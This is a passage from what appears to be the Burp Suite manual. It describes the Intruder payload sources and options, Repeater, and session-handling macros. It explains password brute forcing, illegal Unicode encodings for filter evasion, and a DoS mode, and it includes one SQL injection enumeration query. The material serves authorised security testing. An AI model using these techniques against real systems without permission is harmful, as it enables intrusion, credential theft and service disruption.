different and unrelated input to be inserted in multiple places within the HTTP request (e.g. a username in one parameter, and an unknown password in another parameter). The total number of requests generated by the attack is the product of the number of payloads in all defined payload sets - this may be extremely large.

Payloads tab

This tab is used to configure one or more sets of payloads. If the "pitchfork" or "cluster bomb" attack types are defined (see Positions tab) then a separate payload set must be configured for each defined payload position (up to a maximum of 8). Use the "payload set" drop-down menu to select which payload set to configure.

For each payload set, it is possible to define the "source" of payloads to use (e.g. preset list, character blocks, brute forcer, etc.), and also various additional processing to be performed on each payload. A large number of payload sources are available within Burp Intruder. Some of these are highly configurable and provide for a huge variety of customised attacks. The source for the current payload set is selected using the drop- down menu. Each payload source is explained separately below.

Payload Sources

Preset list

This is the simplest payload source, and configures a preset list of payload items: The main controls for configuring the list are at the bottom right of the panel. Items can be added manually using the text box and the "add" button. The "add from list" pull- down menu can be used to add predefined lists of useful payloads, including common usernames and passwords, strings designed to detect common vulnerabilities such as SQL injection, etc. The "load." button is used to import items from a text file. The "paste" button adds a list of items from the clipboard. The "delete" button removes the selected item, and the "clear" button removes all items from the list.

You can customise the predefined lists of payloads that are accessible on the "add from list" menu. To do this, select "configure preset payload lists" from the Intruder menu, and choose your own directory containing payload files. You can use the "copy" button to copy all of Burp's built-in payload lists into your custom directory, to use alongside your own payloads lists: Runtime file

This payload source configures an external text file from which payloads will be read at runtime. This is useful when a very large list of predefined payloads is needed, to avoid holding the entire list in memory. One payload is read from each line of the file, hence payloads may not contain newline characters.

Custom iterator

This payload source provides a powerful way to generate custom permutations of characters or other items according to a given template. For example, a payroll application may identify individuals using a personnel number of the form AB/12; you may need to iterate through all possible personnel numbers to obtain the details of all individuals. The custom iterator defines up to 8 different "positions" which are used to generate permutations. Each position is configured with a list of items, and an optional "separator" string, which is inserted between that position and the next. In the example described above, positions 1 and 2 would be configured with the items A - Z, positions 3 and 4 with the items 0 - 9, and position 2 would be set with the separator character /. When the attack is executed, the custom iterator iterates through each item in each position, to cover all possible permutations. Hence, in this example, the total number of payloads is equal to 26 * 26 * 10 * 10.

The "scheme" drop-down menu can be used to select a preconfigured setup for the custom iterator. These can be used for various standard attacks or modified for customised attacks. Available schemes include "directory / file . extension", which can be used to enumerate web content, and "password + digit" which can be used to generate an extended wordlist for password guessing attacks.

The controls at the bottom right are used to configure the items at each position. They function in the same way as the controls in thepreset list source. The "clear all" button removes all configuration from all positions of the custom iterator.

Character substitution

This payload source takes a preset list of payload items, and produces several payloads from each item by replacing individual characters in the item with different characters, according to customisable rules. This payload source is useful in password guessing attacks, e.g. for producing common variations on dictionary words:

The controls at the bottom right are used to configure the list of preset items. They function in the same way as the controls in the preset list source.

The list of checkboxes on the right is used to configure the substitution rules. When the attack is executed, the character substitution source works through each of the preset items in turn. For each item, it generates a number of payloads, to include all permutations of substituted characters according to the defined rules. For example, for the first item in the above screenshot, the following payloads will be generated: aahed

4ahed a4hed

44hed aah3d

4ah3d a4h3d 44h3d

Case substitution

This payload source takes a preset list of payload items, and produces one or more payloads from each item by adjusting the case of characters within each item. This payload source may be useful in password guessing attacks, e.g. for producing case variations on dictionary words.

The controls at the bottom right are used to configure the list of preset items. They function in the same way as the controls in the preset list source.

The checkboxes on the right are used to configure the case substitution rules. The available rules perform the following functions:

 no change - the item is added to the payload set without being modified  to lower case - all letters in the item are converted to lower case, and the result is added to the payload set  to upper case - all letters in the item are converted to upper case, and the result is added to the payload set  to Propername - the first letter in the item is converted to upper case, the subsequent letters are converted to lower case, and the result is added to the payload set  to ProperName - the first letter in the item is converted to upper case, the subsequent letters are not changed, and the result is added to the payload set

When the attack is executed, the case substitution source works through each of the preset items in turn. For each item, it generates a payload for each of the selected case substitution rules. If the rule results in a new unique payload, it is added to the payload set (i.e. duplicate payloads are discarded). For example, for the first item in the above screenshot, the following payloads will be generated:

aahed

AAHED

Aahed

Recursive grep

This payload set works together with the "extract grep" function (which is explained below). It allows payloads to be generated recursively on the basis of responses to earlier requests. The "extract grep" function captures a portion of a server response following a matched regular expression. With "recursive grep" payloads, the captured text from the previous server response is used as the payload for the subsequent request.

This can be used for various enumeration tasks. For example, it may be possible to enumerate the contents of a database via SQL injection by recursively submitting queries of the form:

union select name from sysobjects where name>'a'

The server's error message discloses the name of the first database object: Syntax error converting the varchar value 'accounts' to a column of data type int.

The query is then repeated using 'accounts' to identify the next object. This task can be easily automated using recursive grep payloads to quickly enumerate all of the objects within the database.

The payload to use in the first request must be manually specified. The payload source can be configured to stop when duplicate successive recursive grep items are found, as this usually indicates that the enumeration is complete. Note that because of the nature of this payload source, attacks which use it cannot use multiple request threads.

Illegal Unicode

This payload source takes a preset list of payload items, and produces a number of payloads from each item by replacing a specified character within each item with illegal Unicode-encodings of a specified character. This payload source may be useful in attempting to circumvent input validation based on pattern-matching, for example defences against path traversal attacks which match on expected encodings of the ../ and ..\ sequences.

The controls at the bottom right are used to configure the list of preset items. They function in the same way as the controls in the preset list source. The two text boxes at the top configure the character to be substituted within each preset item (here *), and the character to be used as the basis for the illegal encodings (here /). The latter can be specified using the ASCII character itself, or the two-digit hex code for the character (e.g. 00) - this is useful for specifying non-printable ASCII characters, such as null.

The controls in the middle configure the types of illegal encodings which will be generated. These are explained below:

 maximum overlong UTF-8 length - The Unicode encoding scheme allows up to 6 bytes to be used to represent a single character. Basic ASCII characters (0x00 - 0x7F) are correctly represented using a single byte. However, it is possible to represent these in the Unicode scheme using more than one byte (i.e. "overlong" encoding). This drop-down menu is used to specify whether overlong encoding should be used, and if so to set the maximum size that should be used.  illegal UTF-8 variants - This option is available if a maximum overlong UTF-8 length of 2 bytes or more is selected. When a character is encoded with more than one byte, the bytes following the first should take the binary form 10xxxxxx, to designate that they are continuation bytes. However, the most significant bits of the first byte also identify how many continuation bytes will follow, so Unicode decoding routines may safely ignore the first 2 bits of continuation bytes. This means that three illegal variants of each continuation byte are possible, with the binary forms 00xxxxxx, 01xxxxxx and 11xxxxxx. If this option is selected, then the illegal Unicode payload source will generate 3 additional encodings for each continuation byte.  max permutations - This option is available if a maximum overlong UTF-8 length of 3 bytes or more is selected, and "illegal UTF-8 variants" is selected. If the "max permutations" option is not selected, then the illegal Unicode payload source will work through each continuation byte in turn when generating illegal variants; for each continuation byte, three illegal variants will be generated and the other continuation bytes will be unchanged. If the "max permutations" option is selected, however, then the illegal Unicode payload source will generate all permutations of illegal variants for continuation bytes - i.e. more than one continuation byte will be modified simultaneously. This feature may be useful in attempting to circumvent advanced pattern-matching controls on the target system.  illegal hex - This option is always available. When the list of illegally-encoded items has been generated using overlong encoding and illegal variants of continuation bytes (if selected), it is possible to modify the hexadecimal encoding of the resultant byte sequences to confuse certain pattern-matching controls. Hex encoding uses the characters A - F to represent the decimal values 10 - 15. However, some hex decoders interpret G as decimal 16, H as decimal 17, etc. So 0x1G may be interpreted as decimal 32. In addition, if illegal hex characters are used in the first position of a two digit hex code, then the resultant decoding overflows the size of a single byte, and in this case some hex decoders only use the 8 least significant bits of the resulting number. So 0xG1 may be decoded as decimal 257, which is then interpreted as decimal 1. Each legal two digit hex code has between 4 and 6 corresponding illegal hex representations which are interpreted as that same hex code if decoded as described above. If the "illegal hex" option is selected, then the illegal Unicode payload source will generate all possible illegal hex encodings of each byte in the list of illegal-encoded items.  max permutations - This option is available if a maximum overlong UTF-8 length of 2 bytes or more is selected, and "illegal hex" is selected. If the "max permutations" option is not selected, then the illegal Unicode payload source will work through each byte in turn when generating illegal hex; for each byte, between 4 and 6 illegal hex encodings will be generated and the other bytes will be unchanged. If the "max permutations" option is selected, however, then the illegal Unicode payload source will generate all permutations of illegal hex for all bytes - i.e. more than one byte will be modified simultaneously. This feature may be useful in attempting to circumvent advanced pattern-matching controls on the target system.  add % prefix - If this option is selected, then the % character will be inserted before each two digit hex code in the payloads generated.  lower case hex - This option determines whether lower or upper case alphabet characters will be used in hex codes.  max encodings - This option places a ceiling on the number of illegal encodings that will be generated. This can be useful if large overlong encodings are being used and / or max permutations have been selected, as these options may generate huge numbers of illegal encodings.

When the attack is executed, this payload source iterates through the list of preset items, and for each preset item replaces all instances of the specified character with each item in turn in the set of illegal encodings.

Character blocks

This payload source generates character blocks of specific sizes using a given input string. It can be useful in detecting buffer overflow and other boundary condition vulnerabilities in software running in a native (unmanaged) context: The "string" field specifies the input string from which the character blocks will be generated. The "min" and "max" fields specify the lengths of the smallest and largest character blocks that may be generated. The "step" field specifies the increment in the length of each character block.

Numbers

This payload source generates numbers, either sequentially or at random, in a specified format:

The "from" and "to" fields specify the smallest and largest number that may be generated. If "sequential" is selected, the numbers start at the value in the "from" field, and are incremented by the value in the "step" field. If "random" is selected, the "how many" field specifies the number of numbers to be generated. Numbers can be generated in decimal or hexadecimal form. If hexadecimal is selected, then the "from", "to" and "step" fields must contain hexadecimal integers; otherwise they may contain decimal integers or fractions. The controls on the right-hand side specify the number format which will be used.

Dates

This payload source generates dates between a specified range, at a specified interval, in a specified format. This payload source may be useful during data mining (e.g. trawling an order book for entries placed on different days) or brute forcing (e.g. guessing the date of birth component of a user's credentials):

The dates generated start with the date specified in the "from" controls, and are incremented by the interval specified in the "step" controls, up to or including the date specified in the "to" controls. Several predefined date formats can be selected in the "format" pull-down menu, or a custom date format can be entered in the text field. The following examples illustrate the codes that can be used to specify custom date formats:

E Sat

EEEE Saturday d 7 dd 07

M 6

MM 06

MMM Jun

MMMM June yy 03 yyyy 2003

/ . : etc / . :

Brute forcer

This payload source generates a set of payloads of specified lengths which contain all possible permutations of a specified character set.

Null payloads

This payload source generates "null" payloads - i.e. zero-length strings. It can generate a specified number of null payloads, or continue indefinitely.

This payload source is useful when an attack requires the same request to be made repeatedly, without any modification to the basic template. To achieve this, a single pair of position markers should be placed together anywhere in the request template (see Positions tab). This can be used for a variety of attacks, for example harvesting cookies for sequencing analysis, application-layer denial-of-service attacks where requests are repeatedly sent which initiate high-workload tasks on the server, or keeping alive a session token which is being used in other intermittent tests. Char frobber

This payload source operates on the existing base value of each payload position, or on a specified string. It cycles through the base string one character at a time, incrementing the ASCII code of that character by one.

This payload source is useful when testing which parameter values, or parts of values, have an effect on the application's response. In particular, it can be useful when testing which parts of a complex session token are actually being used to track session state. If modifying the value of an individual character within the session token still causes your request to be processed within your session, then it is likely that this character in the token is not actually being used to track your session.

Bit flipper

This payload source operates on the existing base value of each payload position, or on a specified string. It cycles through the base string one character at a time, flipping each (specified) bit in turn. You can configure the bit flipper either to operate on the literal base value, or to treat the base value as an ASCII hex string. For example, if the base value is "ab" then operating on the literal string and flipping all bits will result in the following payloads:

`b cb eb ib qb

Ab

!b

áb ac a` af aj ar aB a" aâ

Whereas treating "ab" as an ASCII hex string and flipping all bits will result in the following payloads: aa a9 af a3 bb

8b eb

2b

This payload source can be useful in similar situations to the char frobber but where you need finer-grained control. For example, if session tokens or other parameter values contain meaningful data encrypted with a block cipher in CBC mode, it may be possible to change parts of the decrypted data systematically by modifying bits within the preceding cipher block. In this situation, you can use the bit flipper payload source to determine the effects of modifying individual bits within the encrypted value, and understand whether the application may be vulnerable.

Username generator

This payload source takes human names as input, and generates usernames using various common schemes. For example, supplying the name "peter weiner" results in up to 115 possible usernames, as follows: peterweiner peter.weiner weinerpeter weiner.peter peter weiner peterw peter.w wpeter w.peter pweiner p.weiner weinerp weiner.p etc...

This payload source can be useful if you are targeting a particular human user, and you do not know the username or email address scheme in use within an application.

Payload processing

For each payload set, in addition to the "source" of payloads to use, it is possible to define various additional processing to be performed on each payload. This processing is carried out after all manipulation performed by the selected payload source: The defined rules are executed in sequence, and can be toggled on and off to help debug any problems with the configuration. The following types of rule are available:

 add prefix  add suffix  match/replace  substring (from a specified offset up to a specified length)  reverse substring (as substring, but indexed from the end of the payload)  modify case (same options as for the case substitution payload source)  encode (as URL, HTML, Base64, ASCII hex and constructed strings for various platforms)  decode (as URL, HTML, Base64 and ASCII hex)  hash  addition of raw payload (this can be useful if you need to include the same payload in both raw and hashed form)

Finally, you can configure which characters within the resulting payload should be URL- encoded for safe transmission within HTTP requests:

It is recommended to use this setting for final URL-encoding, rather than a payload processing rule, because the payload grep option can be used to check responses for echoed payloads before the final URL-encoding is applied. Options tab

This tab contains various configuration options which control the behaviour of individual attacks.

These options are used to configure the manipulation of HTTP headers in generated requests.

If the "update Content-Length header" box is checked, then Burp Intruder will add or update the Content-Length HTTP header in each request, with the correct value for the length of the HTTP body of that particular request. This feature is usually essential for attacks which insert variable-length payloads into the body of the template HTTP request. The HTTP specification, and most web servers, require the correct value for the length of the HTTP body to be specified using the Content-Length header. If the correct value is not specified, then the target server may return an error, may respond to an incomplete request, or may wait indefinitely for further data to be received in the request.

If "set Connection: close" is checked, then Burp Intruder will add or update the Connection HTTP header to request that the connection is closed following each individual request. In some cases (when the server does not itself return a valid Content-Length or Transfer-Encoding header), this option may allows attacks to be performed more quickly.

Note: Earlier versions of Burp Intruder contained options here to add a cookie header to the request, based on the response to a different request. These configurations have now been removed, and you should use the suite-wide session handling support instead. The concurrent threads setting determines whether the attack will launch requests synchronously in a single thread, or concurrently using multiple threads. Using multiple threads can rapidly accelerate a large attack, where the main time factor is the latency between issuing each request and receiving a response. It can be used to test for concurrent processing vulnerabilities in applications. And it can be used to increase the effectiveness of application-layer denial-of-service attacks.

The retry settings determine how many times Burp will repeat a request if a network failure occurs (e.g. the connection is refused or times out), and how long it will wait between retries.

The throttle settings are used to configure any time delay required between requests. A fixed delay may be desirable as a stealth precaution, to avoid a performance impact, to preserve bandwidth or processing power for other activities, or to perform a required action periodically, such as keeping alive a session token which is being used in other intermittent tests. A variable delay can be useful to automate the detection of session timeout values.

The start settings determine whether the attack will begin immediately when launched, or will begin after a specified delay, or will wait until the "resume" command is selected (see Results view). This function can be useful if an attack is being configured which will be executed at some future point, or saved for future use. The storage settings determine whether the attack will save the contents of individual requests and responses. Saving requests and responses consumes disk space in your temporary directory, but enables you to view these in full during an attack, repeat individual requests if necessary, and send items to other Burp tools.

If the "make unmodified baseline request" option is selected, then in addition to the configured attack requests, Burp will issue the template request with all payload positions set to their base values. This request will show as item #0 in the results table.

If the "DoS mode" option is selected, then the attack will issue requests as normal but will not wait to process any responses received from the server. As soon as each request is issued, the TCP connection is closed. This function can be used to perform application-layer denial-of-service attacks against vulnerable applications, by repeatedly sending requests which initiate high-workload tasks on the server.

If the "store full payloads" option is selected, Burp will store the full payload values for each result. This option consumes additional memory but may be required if you want to perform certain actions at runtime, such as modifying payload grep settings, or reissuing requests with a modified request template. The "grep" settings are used to configure various pattern-matching based tests to be performed at runtime on server responses. There are three types of tests: match grep - This is used to check each server response for specified expressions, either simple pattern matches or Perl-like regular expressions. For each specified expression, the attack will include a column in the results table indicating whether a match was found. This basic feature has a wide variety of uses, for example: in password guessing attacks, scanning for phrases such as "password incorrect" or "login successful"; in testing for SQL injection vulnerabilities, scanning for messages containing "ODBC", "error", etc.

If regular expressions are used as matching expressions, then these may contain newline characters. extract grep - This is used to check each server response for specified expressions, and if present to extract the text immediately following the matched expression (up to a specified delimiter or maximum length). For each specified expression, the attack will include a column in the results table containing the text extracted from each server response. This feature can be used for data mining, where access has been gained to a web page containing useful information, and an automated means of extracting this information is required. For example, if you have gained access to a user administration page, which is used to access or update the account information of the user whose ID is specified in the URL query string, then you can execute an attack which iterates through user IDs and extracts the username and password of each user.

If the same matching expression is added multiple times in succession, then each server response will be searched for multiple occurrences of that expression, and the text immediately following each occurrence will be captured. This can be useful, e.g. when an HTML table contains useful information but there are no unique prefixes with which to automatically pick out each item. payload grep - This is used to check each server response for the payload string(s) which were used in the corresponding request. This feature is useful in detecting cross- site scripting and other response injection vulnerabilities, which can arise when user input is dynamically inserted into the application's response.

If the "match against pre-encoded payloads" option is selected, then responses are searched for the raw form of each payload string before any encoding was applied (see Payload processing). Setting this option is normally desirable - for example, if you use XSS test payloads containing typographical characters, these will typically need to be URL-encoded in the payload processing options, but will appear in responses in their pre-encoded form if the application is vulnerable.

The redirect settings control whether Burp Intruder will follow HTTP redirects (i.e. those with a 3xx status code and a Location header containing a new URL) when performing an attack. If configured to follow redirects, then when a redirect is received Intruder will request the redirection URL (following up to 10 redirections if necessary), and record the details of the subsequent response within the results. A column in the results table will indicate whether a redirect was followed for each individual result. You can configure whether to follow only on-site (i.e. same protocol, host and port) redirects, only in-scope (defined in Target tab) redirects, or to follow all redirects. The option to follow redirects is often useful when an application returns a 3xx response to various kinds of input, with the more interesting features of the application's processing of your request being returned when the redirection target is requested. For example, when fuzzing for common vulnerabilities, the application may frequently return a redirect to an error page - this page may contain useful information about the nature of the error which can be used to diagnose bugs like SQL injection.

Note that in some situations it may be necessary to use only a single-threaded attack when redirects are being followed, for example if the application stores within the session the information which is returned by the next request to the redirection target. Note also that automatically following redirects may sometimes cause problems for your attack - for example, if the application responds to some malicious requests with a redirection to the logout page, then following redirects may result in your session being terminated when it would not otherwise do so.

If the "process cookies in redirects" option is selected, then any cookies set in the 3xx response will be resubmitted when the redirection target is followed. For example, this option may be necessary if you are attempting to brute force a login challenge which always returns a redirection to a page indicating the login result, and a new session is created in response to each login attempt.

Launching an attack

To create a new attack, use the control panel tabs to set the required configuration, then select "start attack" from the Intruder menu. To load a saved attack, select "open saved attack" from the Intruder menu, and choose the required file.

When a new attack is executed, various validation checks are performed on the specified configuration. This includes verifying that payload position(s) and payload set(s) are correctly defined, that timing and grep settings are valid, etc. Some failures generate errors which prevent the attack from executing; others generate warnings which may be ignored.

Each attack opens in a separate window. This window displays the results of the attack as they are generated, enables you to modify the attack configuration in real time, and also contains a number of options for controlling the attack, and saving the results, server responses and the attack itself.

Note: When modifying the live configuration of a running attack, you should proceed with caution and consider pausing the attack before making changes. Results tab

The following is an example of the results view for an attack performing basic content enumeration on a target website:

This attack uses the sniper attack type (see Positions tab) to make requests for a series of common names of web directories. For this attack type, the results view displays by default the number of each request, the payload position used (if more than one is configured), the payload inserted, the HTTP status code received from the server, whether or not an error or timeout occurred, and the length of the server's response. Additional results columns that can be displayed include the "received response" and "finished response" timers for each request, and any cookies received. Various configuration options, such as the grep functions, will cause additional columns to appear in the results view. Columns can be hidden or revealed using the "view" menu. The set of results can be sorted according to the contents of any results column by clicking on the relevant header (and reverse-sorted by shift-clicking the header). You can copy the contents of a column by ctrl-clicking the header [Pro version].

A key part of effectively interpreting the results of an attack is locating interesting or successful server responses, and identifying the requests which generated these. Interesting responses can usually be differentiated through at least one of the following:

 a different HTTP status code;  a different length of response;  the presence or absence of certain expressions;  the occurrence of an error or timeout; or  the time taken to receive or complete the response.

For example, in a content discovery exercise, requests for existing resources might return a "200 OK" response of varying lengths, while requests for nonexistent resources might return a "404 Not found" response, or a "200 OK" response containing a fixed- length custom error page. Or in a password guessing attack, failed login attempts might generate a "200 OK" response containing the keywords "login failed", while a successful login might generate a "302 Object moved" response, or a "200 OK" response of a different length containing the word "welcome".

Burp Intruder can provide assistance in identifying any of the above differentiators. The grep functions (see Grep tab) can be used to mark responses containing known keywords, or to extract interesting information from key parts of the page. In the results view, results can be sorted by clicking a column header, or reverse sorted by shift-clicking the header. In the above example, the HTTP status code is the main differentiator of interesting results, and the results have been sorted to pinpoint these.

You can annotate individual or multiple items, by adding comments and highlights:

You can highlight individual items using a drop-down menu on the left-most table column: And you can comment individual items in-place by double-clicking and editing the table cell:

When you have annotated interesting requests, you can use column sorting and display filters to quickly find these items later.

If the attack was configured to store requests and./or responses, then you can use the preview pane to view these or double-click an individual result to display details of the request and response. This display provides detailed analysis and rendering of each HTTP message. The "previous" and "next" buttons can be used to cycle through the set of results. If the table in the results view has been sorted, then the results will be displayed in the sequence currently showing in that view. If the attack is configured to follow redirections, all intermediate responses and requests are also displayed, alongside the initial request and final response.

You can use the "action" button to send the request or response to other Burp Suite tools, such as Repeater. You can also right-click any item in the results table to show a context menu with various options: You can send the selected item to other tools, add multiple items to the Suite site map, annotate items with comments and highlights, or mark items to be re-requested. This option is useful if network errors or other problems have affected some of the results. If you have modified the base request template or other options during the attack, items to be re-requested will be rebuilt with the current configuration if possible. So, for example, if your application session has been terminated part way through an attack, you can modify the base request template with a new session token, and re-issue any failed requests so that they are executed within your new session.

At the top of the results table is a filter bar, which you can use to hide certain results, based on HTTP status code, search terms, and user-applied annotations: As well as filtering, you can also permanently delete items from the results, by selecting one or more items in the results table, and choosing "delete" from the context menu.

Results menus

The results view contains several menus with commands for controlling the attack, and saving the results, server responses and the attack itself. These are described below.

Attack menu

This contains commands to pause, resume, or repeat the attack.

Save menu

 attack - This is used to save a copy of the current attack, including results. The saved file can be loaded for further use from within the Burp Intruder control panel.  results table - This is used to save the results table as a text file. Individual rows and columns can be selected, or the entire table can be saved. The field delimiter can also be configured. This function is useful for exporting the results into a spreadsheet for further analysis, or for saving a single column (such as data mined using the extract grep function) to be used as an input file for subsequent attacks or other tools.  server responses - This is used to save the full responses received from the server to all requests. These can either be saved in individual files (sequentially numbered), or concatenated in sequence into a single file.  attack configuration - This is used to save the configuration of the currently executing attack (not the results) enabling you to load that configuration into the main Intruder control panel to configure the same or a similar attack. View menu

This contains commands to view or hide each of the available data columns in the results table (the columns available depend upon the configuration of the current attack). Using Burp Repeater

Burp Repeater is a tool for manually modifying and reissuing individual HTTP requests, and analysing their responses. It is best used in conjunction with the other Burp Suite tools. For example, you can send a request to Repeater from the target site map, from the Burp Proxy browsing history, or from the results of a Burp Intruder attack, and manually adjust the request to fine-tune an attack or probe for vulnerabilities.

When you send a request to Repeater from another tool, that request gets its own tab. Each tab has its own request and response windows, and its own history. The top half of the panel allows you to configure the target host and port, and the details of your request. You can complete this information manually, however when you send a request from another Burp Suite tool the relevant details are all completed for you: When you have configured a request, click the "go" button to send it to the server. The response is displayed in the bottom half of the display. For both requests and responses, various views of the message are available:

 raw - This displays the message in plain text form. At the bottom of the text pane is a search and highlight function which can be used to quickly locate interesting strings within the message, such as error messages. An options pop-up on the left of the search bar lets you control case sensitivity, and whether to use simple text or regex search.  params - For requests containing parameters (within the URL query string, the Cookie header, or the message body), this tab analyses the parameters into name/value pairs and allows these to be easily viewed and modified.  headers - This shows the HTTP headers of the message as name/value pairs, and also displays any message body in raw form.  hex - This allows direct editing of the raw binary data that make up the message. Certain types of traffic (e.g. browser requests with MIME-encoded parts) contain binary content that may be corrupted if modified in the text editor. To modify this type of message, the hex editor should be used.  HTML / XML - For responses containing content in these formats, this provides a syntax-colourised view of the message body.  render - For responses containing HTML or image content, this renders the content in visual form, as it would appear within your browser.  AMF - For requests and responses in Action Message Format, this displays a tree view of the decoded message. If editable, you can double-click individual nodes in the tree to modify their values.  viewstate - For requests containing an ASP.NET ViewState parameter, this deserialises the contents of the ViewState, enabling you to review the data contained for any sensitive items. It also indicates whether the ViewState MAC option is enabled (and therefore whether the ViewState can be modified).

Right-clicking on any request or response produces a context menu that can be used to perform various actions:

 send to - You can send any message, or a selected portion of the message, to other tools within Burp Suite, to perform further attacks or analysis.  find references - [Pro version only] You can use this function to search all of Burp's tools for HTTP responses which link to the selected item.  discover content - [Pro version only] You can use this function to discover content and functionality which is not linked from visible content which you can browse to or spider.  schedule task - [Pro version] You can use this function to create tasks which will run automatically at defined times and intervals.  change request method - For requests, you can automatically switch the request method between GET and POST, with all relevant request parameters suitably relocated within the request. This option can be used to quickly test the application's tolerance of parameter location in potentially malicious requests (e.g. cross-site scripting).  change body encoding - For requests, you can switch the encoding of any message body between application/x-www-form-urlencoded and multipart/form-data.  copy URL - This function copies the full current URL to the clipboard.  copy to file - This function allows you to select a file and copy the contents of the message to the file. This is handy for binary content, when copying via the clipboard may cause problems. Copying operates on the selected text or, if nothing is selected, the whole message.  paste from file - This function allows you to select a file and paste the contents of the file into the message. This is handy for binary content, when pasting via the clipboard may cause problems. Pasting replaces the selected text or, if nothing is selected, inserts at the cursor position.  save item - This function lets you specify a file to save the selected request and response in XML format, including all relevant metadata such as response length, HTTP status code and MIME type.  convert selection - These functions enable you to perform quick encoding or decoding of the selected text in a variety of schemes.  URL-encode as you type - If this option is turned on then characters like & and = will be automatically replaced with their URL-encoded equivalents as you type.

You can use the "<" and ">" buttons to browse back and forwards through the request history for the current tab, and modify and reissue any individual request, as necessary.

Options

The "repeater" menu controls aspects of Burp Repeater's behaviour.

You can create a new blank tab, delete an existing tab, or rename a tab's caption to help you keep track of your work.

If the "update Content-Length header" box is checked, then Burp Repeater will update the Content-Length header of each request (or add the header if necessary), with the correct value for the length of the HTTP body of that particular request. This feature is useful where the HTTP body has been manually modified, and so may have changed length. The HTTP specification, and most web servers, require the correct value for the length of the HTTP body to be specified using the Content-Length header. If the correct value is not specified, then the target server may return an error, may respond to an incomplete request, or may wait indefinitely for further data to be received in the request.

If the "unpack gzip / deflate" box is checked, then Burp Repeater will decompress gzip- and deflate-compressed content before displaying it.

The redirect settings control whether Burp Repeater will follow HTTP redirects (i.e. those with a 3xx status code and a Location header containing a new URL). The following options are available:

 Never - Repeater will not follow any redirects.  On-site only - Repeater will only follow redirects to the same web "site", i.e. to URLs employing the same host, port and protocol as was used in the original request.  In-scope only - Repeater will only follow to URLs that are within the Suite-wide target scope (defined in the "target" tab).  Always - Repeater will follow redirects to any URL whatsoever. You should use this option with caution - occasionally, web applications relay your request parameters in redirections to third-party web sites, and by following redirects you may inadvertently attack an application that you do not intend to.

When Repeater receives a redirect that is is configured to follow, it will request the redirection URL (following up to 10 redirections if necessary, after which it stops so as to avoid infinite loops). The response from the redirection URL is then displayed in the response panel. The status message will indicate if a redirection was followed, and if so how many.

The option to follow redirects is often useful when an application returns a 3xx response to various kinds of input, with the more interesting features of the application's processing of your request being returned when the redirection target is requested. For example, when probing for common vulnerabilities, the application may frequently return a redirect to an error page - this page may contain useful information about the nature of the error which can be used to diagnose bugs like SQL injection.

If the "process cookies in redirects" option is selected, then any cookies set in the 3xx response will be resubmitted if a redirects to the same domain is followed.

Note that when Burp Repeater receives a redirection response which it is not configured to follow automatically, it will display a "follow redirect" button near to the top of the Repeater interface. This allows you to manually follow the redirect after viewing it. This feature is useful for walking through each request and response in a redirection sequence. New cookies will be processed in these manual redirects if this option has been set in the "process cookies" configuration described above.

The "action" sub-menu contains the same context-menu items as are available by right- clicking the request or response panels. Session handling challenges

Some problems commonly encountered when performing any kind of fuzzing or scanning of web applications are:

 The application terminates the session being used for testing, either defensively or for other reasons, and the remainder of the testing exercise is ineffective.  Some functions use changing tokens that must be supplied with each request (for example, to prevent request forgery attacks).  Some functions require a series of other requests to be made before the request being tested, to get the application into a suitable state for it to accept the request being tested.

All of these problems can also arise when you are testing manually, and resolving them manually is often tedious, reducing your appetite for further testing.

Burp contains a range of features to help in all of these situations, letting you continue your manual and automated testing while Burp takes care of the problems for you in the background. All of the session-related configuration can be found in the "sessions" tab, within the main "options" tab.

Burp's cookie jar

Burp maintains a cookie jar which tracks the cookies being used in your various application sessions. The cookie jar is shared between all Burp's tools. Cookies set in responses are stored in the cookie jar, and can be automatically added to outgoing requests.

All of this is configurable so, for example, you can update the cookie jar for cookies received by the Proxy and Spider, and have Burp automatically add cookies to requests sent by the Scanner and Repeater. The cookie jar configuration is shown in the "sessions" tab within the main "options" tab: As shown, by default the cookie jar is updated based on traffic from the Proxy and Spider tools. You can view the contents of the cookie jar and edit cookies manually if you wish:

For all tools other than the Proxy, HTTP responses are examined to identify new cookies. In the case of the Proxy, incoming requests from the browser are also inspected. This is useful where an application has previously set a persistent cookie which is present in your browser, and which is required for proper handling of your session. Having Burp update its cookie jar based on requests through the Proxy means that all the necessary cookies will be added to the cookie jar even if the application does not update the value of this cookie during your current visit.

Burp's cookie jar honours the domain scope of cookies, in a way that mimics Internet Explorer's interpretation of cookie handling specifications. Path scope is not honoured.

Session handling rules Burp lets you define a list of session handling rules, which give you very fine-grained control over how Burp deals with an application's session handling mechanism and related functionality. These rules are configured in the "sessions" tab within the main "options" tab:

Each rule comprises a scope (what the rule applies to) and actions (what the rule does). For every outgoing request that Burp makes, it determines which of the defined rules are in-scope for the request, and performs all of those rules' actions in order (unless a condition-checking action determines that no further actions should be applied to the request).

The scope for each rule can be defined based on any or all of the following features of the request being processed:

 The Burp tool that is making the request.  The URL of the request.  The names of parameters within the request.

Each rule can perform one or more actions. The following actions are implemented:  Add cookies from the session handling cookie jar.  Set a specific cookie or parameter value.  Check whether the current session is valid, and perform sub-actions conditionally on the result.  Prompt the user for in-browser session recovery.  Run a macro.  Run a post-request macro (this issues the current request, and then executes a further macro).

All of these actions are highly configurable, and can be combined in arbitrary ways to handle virtually any session handling mechanism. Being able to run arbitrary macros (defined request sequences), and update specified cookie and parameter values based on the result, allows you to automatically log back in to an application part way through an automated scan or Intruder attack. Being able to prompt for in-browser session recovery enables you to work with login mechanisms that involve keying a number from a physical token, or solving a CAPTCHA-style puzzle.

By creating multiple rules with different scopes and actions, you can define a hierarchy of behaviour that Burp will apply to different applications and functions. For example, on a particular test you could define the following rules:

 For all requests, add cookies from Burp's cookie jar.  For requests to a specific domain, validate that the current session with that application is still active, and if not, run a macro to log back in to the application, and update the cookie jar with the resulting session token.  For requests to a specific URL containing the __csrftoken parameter, first run a macro to obtain a valid __csrftoken value, and use this when making the request.

The details of how to configure Burp to achieve this are described in later sections.

Macros

A key part of Burp's session handling functionality is the ability to run macros, as defined in session handling rules. A macro is a predefined sequence of one or more requests. Typical use cases for macros include:

 Fetching a page of the application (such as the user's home page) to check that the current session is still valid.  Performing a login to obtain a new valid session.  Obtaining a token or nonce to use as a parameter in another request.  When scanning or fuzzing a request in a multi-step process, performing the necessary preceding requests, to get the application into a state where the targeted request will be accepted.  In a multi-step process, after the "attack" request, completing the remaining steps of the process, to confirm the action being performed, or obtain the result or error message from the conclusion of that process.

Macros are recorded using your browser. When defining a macro, Burp displays a view of the Proxy history, from which you can select the requests to be used for the macro. You can select from previously made requests, or record the macro afresh and select the new items from the history.

